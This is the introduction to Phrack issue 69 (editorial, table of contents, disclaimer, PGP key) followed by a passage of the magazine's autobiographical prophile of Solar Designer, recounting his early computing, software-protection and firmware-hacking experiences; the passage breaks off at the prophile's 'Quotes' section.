Phrack #69

EDB-ID:

42880

CVE:

N/A

Author:

phrack

Type:

papers

Platform:

Magazine

Published:

2016-05-06

                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x01 of 0x10

|=-----------------------------------------------------------------------=|
|=-------------------------=[ Introduction ]=----------------------------=|
|=-----------------------------------------------------------------------=|
|=----------------------=[ by the Phrack staff ]=------------------------=|
|=-----------------------=[ staff@phrack.org ]=--------------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[  May 6, 2016  ]=---------------------------=|
|=-----------------------------------------------------------------------=|

               ... A long time ago in a galaxy far far away ...

                     ______ _                    _
                     | ___ \ |                  | |
                     | |_/ / |__  _ __ __ _  ___| | __
                     |  __/| '_ \| '__/ _` |/ __| |/ /
                     | |   | | | | | | (_| | (__|   <
                     \_|   |_| |_|_|  \__,_|\___|_|\_\


                            _  _    ____  _____
                          _| || |_ / ___||  _  |
                         |_  __  _/ /___ | |_| |
                          _| || |_| ___ \\____ |
                         |_  __  _| \_/ |.___/ /
                           |_||_| \_____/\____/




--[ Introduction

Hello Phrack readers! It has been a long time, hasn't it? Aren't you
relieved that the world didn't end in 2012?! What if the Mayans were right?
What if comets hit Earth? Yes, we were worried too, so we decided to take
some time off and enjoy the last days of this planet. Once enough time had
passed, we were pretty sure our species was not going to disappear. It was
about time we returned to our blinking terminals again and finish what we
started :>

Um... yeah, that's the reason the last Phrack release was back in 2012...
Um... Kind of...

Damn, it took so long that even a Star Wars sequel was shot in the
meantime!

Anywayz, the Phrack Staff is back again, with a slightly different
editorial, bringing you an awesome collection of articles from several
respected hackers and other thinkers. No, we are not going to write a
Prophile on our new team. Yes, there are still people who prefer Phrack
over media whoring. The world is full of surprises. It took quite some
time, but we hope this issue of Phrack will meet your expectations.

One new addition to Phrack is the "Paper Feed" feature. The way it works is
that you submit a paper, we review it and it gets published. No need to
wait a month (or two years ;-) until you see your article in the next
Phrack issue. When the time has come, we'll decide to compile a new issue
from the articles that have been submitted. The usual rules do however
still apply: we are proud of being one of the longest-running magazines and
we're especially proud of presenting quality content to our readers (yes,
that's you). Papers submitted to the paper feed are no exception!

Phrack #69 brings you three new technical articles in addition to paper
feed and the standard Linenoise, Loopback and International Scenes philes.
The Firefox hater code-named argp presents advanced exploitation techniques
and attempts to build abstract primitives for taking advantage of various
memory-related vulnerabilities on your "favorite" multi-heap browser ;>
Huku, some guy who, obviously, visits porn sites a lot, has written an art
of exploitation phile focusing on Adobe Flash Player (hey, this is not
P0 man!). Last but not least, uty presents a VT-x based technique for
installing inline hooks and backdooring a whole system. We have spent much
time debugging this, we hope you *do* like it.

This release also comes with an excellent prophile on Solar Designer, a
person we all respect for his knowledge, attitude and contributions. We
were initially hesitant to contact him (yeah this guy has a damn busy
schedule), but it turned out that Solar was positive about being
prophiled. We believe this prophile will inspire a lot of people in the
scene - it's undoubtedly one of the best prophiles ever published in Phrack
and a great honor for all readers.

Enjoy maafakaz!


--[ Dark thoughts about the future

As we mentioned above, you have probably noticed a big change in the way
Phrack papers are released. We have decided to also have a paper feed mode
in addition to periodic releases, where each submitted work, that meets the
requirements, is released as soon as it has undergone proper reviewing. We
understand that this may not be as cool as releasing an issue at once, but
it was a necessary choice we had to make to avoid having Phrack fade out of
existence. The hope with this, is that now all you crazy world traveling,
conference speaking rockstars may have a medium for releasing a deeper dive
into the technology that you are presenting, and we can publish this at
the exact moment you are on stage. Personally, we would much prefer this
than trying to extract it ourselves from your pretty slide decks.

I guess we are all responsible for this. The community as a whole. The
hackers, the phreakers and all those tech perverts out there who have
stopped supporting Phrack. Trust me you would be disappointed if you had a
look at our inbox... or maybe no one uses ANTISPAM anymore? :>

For all you hackers out there thinking "I don't have a large project
ready for paper generation", consider writing something for Linenoise. 
Linenoise submissions take between a few hours and one day. As a community 
everyone has some small technique or cool trick that can save other people 
time, Linenoise offers an easy place to share these.

In this issue you will find a very interesting article titled "The Fall of
Hacker Groups". Take some time to read it through and wonder why the fuck
did we get here. The state of mind of the community seems to be changing
dramatically - what have you done to prevent hacking from practically
disappearing?

Quoting Phrack #63:

    "As long as there are hackers, there will be PHRACK magazine."

Now take some time, read this issue carefully, and notice the "as long as"
part in the previous sentence :>


--[ Table of contents

  0x01  Introduction ........................................ Phrack Staff

  0x02  Phrack Prophile on Solar Designer ................... Phrack Staff

  0x03  Phrack World News ................................... Phrack Staff

  0x04  Linenoise ........................................... various

  0x05  Loopback ............................................ Phrack Staff

  0x06  The Fall of Hacker Groups ........................... strauss

  0x07  Revisiting Mac OS X Kernel Rootkits ................. fG!

  0x08  Adobe Shockwave:
        A case study on memory disclosure ................... Aaron Portnoy

  0x09  Modern Objective-C Exploitation Techniques .......... nemo

  0x0a  Self-patching Microsoft XML with misalignments
        and factorials ...................................... Alisa Esage

  0x0b  Internet Voting: A Requiem for the Dream ............ kerrnel

  0x0c  Attacking Ruby on Rails Applications ................ joernchen

  0x0d  Obituary for an Adobe Flash Player bug .............. huku

  0x0e  OR'LYEH? The Shadow over Firefox .................... argp

  0x0f  How to hide a hook: A hypervisor for rootkits ....... uty & saman

  0x10  International Scenes ................................ various


--[ Greetings & thanks

For this issue we have a long list of people we would like to thank. This
issue wouldn't be complete had it not been for their support.

  * strauss       : Straus.. staruss... strsauss.. whatever man!
  * fG!           : The legendary white hat(ed) hero!
  * Aaron Portnoy : Real name detected!
  * nemo          : That lolcat you see in various memes ;-)
  * Alisa Esage   : Knows how to write exploits and doesn't work for P0
  * kerrnel       : What's with the extra "r"?
  * joernchen     : Ruby two-handed fapper
  * argp          : Hardcore Shakira fan - Favorite song "Heaps don't lie"
  * huku          : Casual youporn uploader
  * sysk          : Proud yolo Phrack supporter
  * uty & saman   : Makefiles suck!
  * solardiz      : Awesomeness prophiled
  * fjserna       : Guest reviewer of, well, you can figure out what
  * anonymous     : You know who you are, thanks for you support!

Last but not least, Phrack Staff is indebted to <redacted> *wink *wink*
for his support all these years. You have our respect for everything you
have offered to this magazine. We are now in different teams, but we will
always be glad to have some beers with you and talk about dirty hacks ;>
See you soon man!

Phrack is back! Prepare your arse for a new awesome release of your
favorite zine.


--[ Phrack policy

phrack:~# head -77 /usr/include/std-disclaimer.h
/*
 *  All information in Phrack Magazine is, to the best of the ability of
 *  the editors and contributors, truthful and accurate.  When possible,
 *  all facts are checked, all code is compiled.  However, we are not
 *  omniscient (hell, we don't even get paid).  It is entirely possible
 *  something contained within this publication is incorrect in some way.
 *  If this is the case, please drop us some email so that we can correct
 *  it in a future issue.
 *
 *
 *  Also, keep in mind that Phrack Magazine accepts no responsibility for
 *  the entirely stupid (or illegal) things people may do with the
 *  information contained herein.  Phrack is a compendium of knowledge,
 *  wisdom, wit, and sass.  We neither advocate, condone nor participate
 *  in any sort of illicit behavior.  But we will sit back and watch.
 *
 *
 *  Lastly, it bears mentioning that the opinions that may be expressed in
 *  the articles of Phrack Magazine are intellectual property of their
 *  authors.
 *  These opinions do not necessarily represent those of the Phrack Staff.
 */


                      ----( Contact )----

       <  Editors           : staff[at]phrack{dot}org   >
       >  Submissions       : staff[at]phrack{dot}org   <
       <  Commentary        : loopback[@]phrack{dot}org >
       >  Phrack World News : pwned[at]phrack{dot}org   <


    Submissions may be encrypted with the following PGP key:
    (Hint #1: Always use the PGP key from the latest issue)
    (Hint #2: ANTISPAM or it didn't happen)


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PHRACK

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
=cK7U
-----END PGP PUBLIC KEY BLOCK-----

|=[ EOF ]=---------------------------------------------------------------=|


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x02 of 0x10

|=-----------------------------------------------------------------------=|
|=------------------------=[ PHRACK PROPHILE ON ]=-----------------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[   Solar Designer   ]=-----------------------=|
|=-----------------------------------------------------------------------=|

|=---=[ Specifications

          Handle: Solar Designer
             AKA: solardiz.  Also, I used to hide under my real name.
   Handle origin: A turn-based game played over FidoNet (which IIRC I
                  played just once, but it took a while), and demoscene.
                  In 1994, I needed a handle to register on "private"
                  BBSes where real names were discouraged.  I chose this
                  one without giving it much thought, and it has stuck.
Age of your body: Older than Pushkin
 Height & weight: Quite some & not much
     Produced in: USSR
            Urlz: http://www.openwall.com/phrack
                  I imagine it will be gone when a historian reads this
                  many centuries later.
       Computers: B3-21, MK-52, (no longer have my EC-1841), 386DX40+387,
                  2x MicroVAX 3100-80, 2x Sun Ultra 5/10, Alpha 164SX (and
                  I had a 21066-based Multia for a year before), HP 712/80,
                  development boards (ZedBoard + Epiphany FMC, many ZTEX
                  FPGA boards waiting for their use), routers, etc. (the
                  EdgeRouter Lite is MIPS64, runs FreeBSD, and is used for
                  general development, so surely qualifies as a computer?)
                  HP200LX, Nokia Communicator series (9110, 9300, N900).
                  Lots of semi-ancient x86 (e.g., dual Pentium 3, RIMMs)
                  and many x86-64 (some laptops, etc.), some of which are
                  frankly what I actually use these days.  Some GPUs and
                  Xeon Phi in boxes we've setup for the larger community.
      Creator of: I'm the original author of most of the individual pieces
                  of software released under Openwall, including John the
                  Ripper password cracker and Linux 2.0.x to 2.4.x -ow
                  security hardening patches (now historical).  Openwall
                  GNU/*/Linux distro, with a team.  More recently yescrypt,
                  with 1.0 release planned in 2016.  Assorted programs for
                  DOS in a previous life, including (but not limited to)
                  "software protection" and cracks.
       Member of: Back in 1990s: BPC, uCF; I also participated in w00w00.
        Admin of: Openwall.  We host some moderated mailing lists, etc. -
                  including e.g. oss-security and kernel-hardening, and
                  also including the private distros list (which sort of
                  replaced vendor-sec and those predating it, and which I
                  always have mixed feelings about).  That's already-public
                  info, and it has to be such, so no OPSEC fail here.
        Projects: Most of those currently active at Openwall.
           Codez: You mean stuff that is of more hack and historical value
                  than of direct use?  I am often reminded of those first
                  ret2libc exploits I sent to Bugtraq in 1997.  I'll
                  mention a few more further in this prophile.
    Active since: 1994?  I was not into "the scene" before.
  Inactive since: 1997?  I no longer release under a group since then, so
                  maybe not on the scene either?  Besides, we got a
                  CFAA-alike in Russia since 1997, limiting the playground.
                  That said, I was doing computer stuff before 1994, and I
                  still am now.

|=---=[ Favorites

   Actors: Not really.  I think screenplay matters more.  I recognize some
           screenwriters and directors like Gilliam and Zemeckis.  Oh,
           actually, let me agree with PaX Team's answer here - Chaplin -
           as this is consistent with what I just said.
    Films: I can't pick just a few favorites, but I was relieved to find
           out that The Shawshank Redemption ranks so high on IMDB.  Maybe
           the humanity has hope (or at least IMDB reviewers do).
  Authors: I really would rather not name just a few, or I'd later regret.
           (I already almost regret mentioning just some directors above.)
 Meetings: What's meant to go into this field?  Where to meet?
           Restaurants, cafes, bars without loud music (unless
           intentionally attending a live performance).  I'd also consider
           meeting at a hackerspace.  I rarely meet people in person,
           though.  To compensate for that, I really like it how there are
           now two practical ("non-paper") computer security cons in Moscow
           per year - PHDays in May and ZeroNights in November - with
           mostly the local crowd, but always also some foreign speakers
           and attendees.
      Sex: What's the right answer?  Something like y?(+++++++)?
    Books: I'd say encyclopedia.  Now that would be Wikipedia.
    Novel: Sadly, I am not reading much.  If I were, I would probably not
           be able to single out just a few titles.  As a kid, I read War
           and Peace, and I liked it.  (I hear it was also taught in Soviet
           schools, but luckily I skipped that and read it on my own will.)
           More relevant to Phrack readers, I also recall I liked reading
           (in 1990s) Stephen King's The Dead Zone and John Varley's Press
           Enter (OK, that one is too short for a novel, and I had to look
           up who wrote it to refer to it now, but I did in fact like it).
  Meeting: HAL2001 stands out because it was a first for me, and I liked
           its atmosphere and extent.
    Music: There are few genres that I don't recall ever enjoying listening
           to, but I tend to especially like rock, jazz, bossa nova.
  Alcohol: Dark beer
     Cars: No favorite, and not my thing, but some do look stylish to me or
           have a history or fiction attached to them (such as the
           DeLorean, which apparently wasn't that good a car otherwise).
           I also value the designers' achievements.  At a local retro
           sports car exhibition last year, it was interesting for me to
           see how greatly the horsepower per cc and torque per cc improved
           over the years, and how a few custom engines stood out.  It's an
           optimization problem not entirely unlike what we have in
           computing and communications, where some designs were also
           "ahead of their time".
    Girls: Not between Cars and Food
     Food: Italian is usually a safe bet
   I like: All sorts of freedom (as long as it doesn't infringe on someone
           else's), free time, good people, nature, (im)perfection
I dislike: Simply inverting the "I like" above would be bad enough as it is
           (except that (im)perfection is its own inverse).
           I'd rather not provide even worse (or better, from adversary's
           POV) hints than that.  Oh, I'll add just one: filling out guinea
           pig forms like this... but who am I to break the tradition?

|=---=[ Life in 3 sentences

Way too little achieved in this much time.  I could do a lot more, but if I
act unnaturally would that still be me?  (Rhetorical.)

|=---=[ Passions, what makes you tick

Curiosity and self-defined challenges (especially if unannounced so they
don't become a drag) combined with whatever else I like.

|=---=[ Memorable experiences

You suggest some questions along the lines of "how did you start?" to be
answered for your readers further in my prophile, so I'll turn this section
into a background story for answering those.  It got rather long (and
off-topic?), so your readers should feel free to skip to the next section
and maybe revisit this one later.  Here we go, with some recalled or maybe
just made up computer and electronics related experiences from 1980s and
1990s roughly in chronological order:

Nearly winning a Darwin award as a kid.  Before I got access to computers,
I was having fun with electrical circuits, and some of those experiments
were not well-suited for a kid nor always conducted with appropriate
precautions.  Luckily, this only made me stranger.  When I was 8, I learned
the hard way that you don't test a hypothesis by assuming it's true and
just letting things go wrong if you're wrong, if "wrong" can mean it'd be
the last thing you'd realize.  If you feel you need to test, you recognize
there's a chance you are (or something is) wrong.  It's just like how you
shouldn't test whether your restarted sshd still works by first logging out
and then trying to log back in - something I still see adults do,
presumably because they were not that close to be Darwin winners as kids.

Playing with Soviet cable radio during a few of the "technical breaks"
(when normal broadcast stopped).  Listening to foreign shortwave stations
(DXing?), including through the jamming (was more tolerable out of town).

Finding near the garbage cans a cabinet drawer with tools (including a
soldering iron), electronic parts, and all 12 of the Soviet "Radio"
magazine issues from 1966.  I guess someone had passed away, someone who
ended up having some influence on me.  (Later I actually built and briefly
tested an 80 meter band transmitter described in one of those issues, based
on two vacuum tubes, but I never got into ham radio.)

Fast arbitrary precision division (typically 5 digits per iteration),
writing down some 100+ digit periodic sequences, which felt like magic
(will this thing repeat after N-1 digits again? oh yes it does), on a
non-programmable 8-digit calculator.  I came up with the algorithm on my
own.  I didn't know the word "algorithm" back then, nor programming.

Exploring and eventually programming my father's B3-21, with great fun.

Getting some written-off Soviet mainframe boards with K155 series TTL chips
on them (equivalent to 74 series), mostly K155LA3 (7400).  Luckily, a book
on those just happened to arrive to a nearby bookstore, so I started
building my own logic circuits.  I recall craving for more K155TM2's (7474,
dual D flip-flops), which were lacking.  I ended up desoldering a K155TM2
from an expensive toy, which I was done playing with, to build my own toys
with the flip-flops.  In general, almost all of the electronic parts I was
building circuits from had been previously used.  You couldn't just go to a
store and buy parts that you needed when you needed them.  For example, I
didn't have enough LEDs, so I used transistors and bulbs to indicate logic
levels like if it were 1960s or 70s.

Since 1989 or so, having sporadic time-limited access to BK-0010 and a
variety of x86 ranging from different PC/XT clones (with green phosphor
CGA and Hercules monitors) to early 386+287 (with early vendor-specific
SVGA) and then even the super fast & pricey 386+387 33 MHz.  (I think 486s
were still subject to CoCom export regulation.)  There was also a Japanese
24 pin dot matrix printer capable of up to 360 dpi, with a decent user's
manual on its escape sequences, so I actually printed graphics in 360 dpi
on it, multi-pass and very slow of course.  My own vector font, too,
created in my own font editor.  Not having much time to debug code on the
actual machines, I initially wrote programs on paper and debugged them
mentally, then typed them in and they had to work right with only minor
changes needed.  (This skill later proved especially helpful for firmware
modification, as well as for exploits.)

It's during this period that I learned 16-bit x86 asm through reading some
books and a printout of the disassembly of KILL.COM, a ~4 KB DOS TSR
program that allowed a user to forcibly kill the currently active program
and return to DOS, with both this tool and the Sourcer disassembler having
been given to me by a friend on a floppy.  Other languages explored
included: BASIC dialects; Fortran for bringing programs (that my father was
using for work) from mainframes to PC; Turbo Pascal, which worked the
smoothest, but couldn't use 386's protected mode yet (unlike one of the
Fortran compilers, which could).  (A bit later, I wrote a Fortran 66 to
Pascal source level translator that would reconstruct program structure
from all those labels.  Many years later, I migrated some of those Pascal
programs to Linux/Alpha, building them with GNU Pascal, mostly for fun.)
I also briefly started with C in 1990 or so, but soon abandoned it because
of inefficient static linking under DOS (too much dead code).

Back then, and in DOS, the command-line felt like it was being obsoleted by
tools such as Norton Commander (and then its many clones) and Borland's or
Microsoft's recently introduced IDEs for their compilers, but somehow not
for the assemblers, nor for Fortran.  By 1992, I had an own IDE developed
for DOS (yes, first written on paper, piece after piece, and then typed in
during those occasional computer sessions), which had its own text editor
(as well as bells and whistles such as a calculator - but no, exploits
didn't pop it up) and it was capable of running the CLI compilers with
their output captured via INT 10 intercept and analyzed, so it would place
the cursor right at the error line, just like those vendors' IDEs did.  Of
course, it could also run the just-compiled program... and it could kill
it, too.  Somehow I felt this was important enough for me to have bothered
with all this effort (or maybe it was just about the challenge, as usual).
Over a few years, I also worked on other TUIs and GUIs for various programs
(ranging from 320x200 CGA to weird VGA ModeX resolutions and to 1024x768
SVGA under DOS, with my own drivers and my port of Borland's Turbo Vision
from text to graphics modes).  (It's only after I discovered Unix that I
realized I am perfectly comfortable using a compiler from the command-line,
and don't really need IDEs.  These days, I am not using any IDE.  Maybe I
also moved to developing different kinds of software, where IDEs are less
helpful.  I don't oppose to using an IDE again for a right project.)

MK-52 with its whopping 512 bytes of EEPROM on top of these calculators'
tiny program and data memories.  Yeggogology, where you explore the
undocumented world of the calculator trying not to hit the darkness (you
have to power-cycle when you do).

Together with my father, buying our first home computer, the Soviet PC/XT
software compatible EC-1841, from its previous owner, for a full bag of
Soviet 5 ruble banknotes weighing a few kilograms.  IIRC, my father got
those earlier the same day as a withdrawal of a very recent payment (so not
yet eaten up by the inflation), which came for a project I contributed to
as well.  Somehow the bank only had sealed packs of 5 ruble bills.

"Snow" on CGA screens, and suppressing it, or choosing not to - for speed.

Low-level formatting a brand new unformatted 20 MB MFM hard drive (ST-225),
for a neighbor's EC-1845, with a program I wrote for this one occasion (OK,
I cheated - used BIOS calls - but not a do-it-all routine, which I was not
aware of and might not have had in my BIOS).  Tuning the interleaving, too.

In 1993, already on a 386 at home, cracking a key floppy protected program,
using nothing but DOS debug, paper and pencil, many reboots and patience.
Since then and until 1996, I went into both cracking and creating "software
protection" systems - initially naive, then smarter, and eventually moving
from simple code encryption and anti-debugging tricks (eventually confusing
non-patched SoftICE alright through inconsistent opcode and ModR/M byte
combinations, handling those on INT 6) to use of VMs (NOR CPU, reinventing
OISC as I realize now).

A couple of years later, a brief encounter into creating key floppies for
software protection, with arbitrarily-numbered different-size sectors on a
track and some decoys.  A Win16 DLL, written in asm and using Win16/DPMI/
BIOS calls, to check this floppy.  BIOS actually allowed for a lot of
flexibility through temporarily patching the diskette parameter table from
a critical section.  Of course, this was easily crackable in software, but
that was OK for the given project.

Game programming, on all devices ranging from the calculators (for
turn-based games, as the only way to provide input without interrupting the
program was via the radian-degree switch) to computers.  Reuse of ChiWriter
printer fonts for good-looking large captions on screen.  Playing some
computer games too.  Eventually own multi-window graphics/sprite editor,
own adventure game engine (both recently reused in DOSBox for my ZeroNights
2014 keynote game, and as a toy for my son, who ended up adding so many
sprites to his game that he triggered a stack overflow in the game engine).

Getting on BBSes via a 2400 bps modem in 1993.

Getting on the Internet and on Unix in 1994 - and revisiting C programming.
FTP sites, Archie.  Then early web sites, AltaVista.  X.25 PADs, mostly as
a means to get to a system that would have Internet.  Linux kernel 1.2.3 on
my 386.  Playing mouse to retain Internet access and development access to
non-x86 boxes, and getting a bit carried away.  Back then, I didn't quite
realize I was merely playing mouse, with cats out there.  I also didn't
realize not all other players treated this as a game.  I did have other
ways to get online, such as when physically visiting places that had
Internet access, as well as by using single-line dialups that friends set
up in such places, but I couldn't reasonably use them as much as I wanted
to and they were not part of the game.

Implementing DES in assembly for 32-bit SPARC to use double-register load
and store instructions (thus, 64-bit), which the C compiler somehow
wouldn't use.  The fun part was debugging this on x86, as I didn't have a
SPARC at home yet and didn't want to do it all online, so I wrote a partial
SPARC to x86 assembly source level translator to let me get the computation
right before testing and optimizing on a remote Sun machine.  (Later I also
wrote similar DES code in assembly for Alpha, but debugged it on the real
thing right away.)

Longwave (a few hundred KHz carrier) radio transmission experiment from my
resistor-based Covox on the 386's printer port.  I could pick up Led
Zeppelin's Immigrant Song, which I had digitized from an audio cassette at
6-bit 20 kHz mono via a two-transistor comparator on the same Covox and was
now transmitting, on a commodity receiver from a few meters away.  So I
totally reinvented software-defined radio on my own, having no idea it was
already a thing (Wikipedia says so).  Now this could be called an airgap
bypass PoC (or not, since the receiver wasn't a computer), but I didn't
think in such terms back then.  (And yes, I didn't have a real soundcard.)

Audio playback via floppy drive motors (2 signal levels: low on 3.5", high
also on 5.25").  Yes, Immigrant Song again.  It's only recently that I
learned others did this too (there are videos on YouTube), albeit
apparently without the 2-level separation (and instead with multiple
channels) and for sheet music rather than for arbitrary audio recordings.

A brief experiment with blueboxing using the same Covox, with little luck:
the line responded to 2600+2400, but seemingly ignored other CCITT #5
signals.  (Apparently, blueboxing with different signaling worked on
ex-USSR lines, but usually wasn't completely free, and I never tried to get
into it.  Arbitrary dual-tone capability was even included in the Russian
Courier modems, which were different hacks of USR modems.)

USR Courier modem firmware hacking: I put a debugger with disassembler and
breakpoint support right in there, available via added AT commands, just
for fun.  (How do you implement breakpoints when the code is in EEPROM and
the CPU lacks hardware breakpoint support?  By keeping the CPU in
single-step mode while there's a breakpoint set!  Is it still fast enough
for the modem to work, then?  Turns out that for the supervisor CPU, not
the DSP, the answer is yes, although the lag is barely bearable.)

The disassembler I wrote had only 164 bytes of native code (could it be the
smallest disassembler ever written for a complete CISC ISA?), with the rest
(over 2 KB) being data: a special-purpose data structure with arbitrary bit
patterns to match and strings to print, and cross-references for reuse of
common patterns and substrings across instruction groups.  Is this possibly
interpreted code in a domain-specific language rather than data?  "What's
the difference?"  (WOPR's answer in WarGames, could be about code vs. data)

Making mostly non-impressive intros, probably not my thing.  I might have
contributed to the smallest categories appearing (128-byte initially) by
advocating this in a Russian FidoNet group where the first such competition
was then carried out (and where my entry shared second place with another
participant's), with other competitions in these sizes appearing
internationally shortly thereafter (as the 20 intros from the first Russian
competition were uploaded to foreign sites).

Winning a contest for smallest "mkdir -p" implementation for DOS, with a 20
bytes entry: BA 82 00 5F B8 5C 39 31 05 47 AE 75 FD 4F 31 05 CD 21 EB F0.
How does this program terminate cleanly?  Self-modifying code, and moreover
letting the program XOR over itself.  (The contest rules were weird: only
documented DOS features and startup register values, yet OK to require
trailing backslash.  19 bytes was demonstrated possible, and less than that
might be, with reliance on undocumented startup register values.)

Being wrong yet over-confident or/and elitist on some occasions - luckily
not many (that I recall).  Not good of me.

In 1997, joining an ISP (by demonstrating a vulnerability, of course) and
starting to play cat to keep mice under control (but not hurt), as well as
not needing to play mouse myself anymore.  A tiny unreleased exfiltration
detector I wrote at the time was called Tom.  There was also, in modern
terms, a metadata analysis tool for traffic to one of the first social
networks - ICQ, which was extremely popular among Windows users here - to
keep track of abusers on dialup lines despite changing accounts, and even
be alerted when a friend-of-abuser shows up.  That tool I never let
anyone else use, and never released, for ethical reasons.  (Of course, I
was "entitled" to use it, right?..  Oh, excuses.)

On a related note, caller IDs were very common at homes in Russia, starting
to appear in early 1990s.  These were based on inexpensive telephones with
most of their original contents thrown out and replaced by a board with a
Soviet clone of 8080 or with an imported Z80 CPU.  They reused in-band
signaling initially intended for use by long-distance exchanges (with the
caller's line disconnected for a moment with a relay at their local phone
exchange, to prevent spoofing), but technically also available to the
called party on local calls (and easily audible and tamperable with by the
caller, since the long distance call's anti-spoofing relay wasn't
triggered).  Despite of their popularity at homes, they were almost never
used on dialup lines.  Similarly, while some late modem firmware hacks
included caller ID functionality for ex-USSR, those were targeted at
consumers (including e.g. FidoNet nodes) rather than ISPs.  It's only with
the move of dialup lines to digital interfaces (E1) reaching into the ISPs
in late 1990s to early 2000s that caller numbers commonly started to appear
in TACACS+ or RADIUS server logs at ISPs.  Until then, it was cheaper to
extract and selectively log ICQ UINs.

Also in 1997, posting a rough non-executable user stack patch for the Linux
kernel to LKML while running it on my very computer, and being told that it
can't work (because signal handlers, which I had already worked around in
the patch I posted, and gcc trampolines, which I had not encountered yet
due to libc5 rather than early glibc).

The ISP's chief sysadmin's reaction when I casually mentioned that my Linux
kernel patch we were about to install on the servers had just started to
use ring 2, in addition to 0 and 3.  (We did install, and it worked great.)

Apparently, forgetting my childhood Darwin lessons and letting a coworker
at the ISP flash my modified firmware (fixing a connection stability
issue) into all 16 of the modems in a Total Control unit without
power-cycling it after the first flash... and getting the checksum wrong.
Oops.  (The modems then worked fine until power-cycle.)  Luckily, recovery
was as easy as for the individual Courier modems, so not a big deal, but it
did cost some downtime for those 16 lines (there were many more already).

Tweaking L2 cache timings of the dying Multia to prolong its life, having
read up on 21066's "internal processor registers".  Then returning it to
its owner and buying 164SX+21164PC of my own in 1998, and tweaking L2 cache
timings via 21164PC's different IPRs the other way for speed (years later,
my tweaks would turn out to reliably result in a specific miscompile when
building our Linux distro, Owl - oops).  Tweaking a Modeline for 2000x1500
on a 21" CRT (worked, but was painful to look at because of low refresh
rate; I actually used 1600x1200).  In general, tweaking lots of things.

Finally playing with VMS on VAX a little bit (and VT420's, with yellow
phosphor for a change), including e.g. mounting a filesystem from tape -
something normally not possible on Unix where tape drives are character
devices.  DECnet between Linux and VMS.

This brings us almost to 2000s.  I'll cover some of the newer stuff below.

|=---=[ Quotes

I have no favorites, but I find these relevant:

